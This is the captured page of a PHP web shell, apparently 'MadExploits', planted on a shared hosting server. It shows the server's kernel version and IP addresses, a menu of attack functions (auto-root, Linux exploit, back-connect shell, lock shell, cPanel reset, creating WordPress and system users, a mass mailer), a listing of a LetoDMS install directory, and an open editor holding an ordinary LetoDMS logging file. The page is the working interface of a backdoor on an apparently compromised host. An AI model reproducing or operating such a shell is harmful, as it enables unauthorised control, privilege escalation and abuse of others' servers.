Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.219
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
leto /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
4.36
KB
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
193
B
-rw-r--r--
import.php
4.38
KB
-rw-r--r--
inc.ClassEmailNotify.php
5.92
KB
-rw-r--r--
inc.DBAccess.php
8.99
KB
-rw-r--r--
inc.LogInit.php
1.45
KB
-rw-r--r--
info.xml
2.54
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.31
KB
-rw-r--r--
install.xml
976
B
-rw-r--r--
md5
13.25
KB
-rw-r--r--
notes.txt
2.16
KB
-rw-r--r--
settings.xml
13.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : inc.LogInit.php
<?php // MyDMS. Document Management System // Copyright (C) 2002-2005 Markus Westphal // Copyright (C) 2006-2008 Malcolm Cowe // Copyright (C) 2010-2011 Uwe Steinmann // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation; either version 2 of the License, or // (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program; if not, write to the Free Software // Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. include("[[softpath]]/LetoDMS/Log.php"); if ($settings->_logFileEnable) { if ($settings->_logFileRotation=="h") $logname=date("YmdH", time()); else if ($settings->_logFileRotation=="d") $logname=date("Ymd", time()); else $logname=date("Ym", time()); if(!file_exists($settings->_contentDir.'log')) @mkdir($settings->_contentDir.'log'); if(file_exists($settings->_contentDir.'log') && is_dir($settings->_contentDir.'log')) $logger = Log::factory('file', $settings->_contentDir.'log/'.$logname.'.log'); else $logger = null; } else { $logger = null; } ?>
Close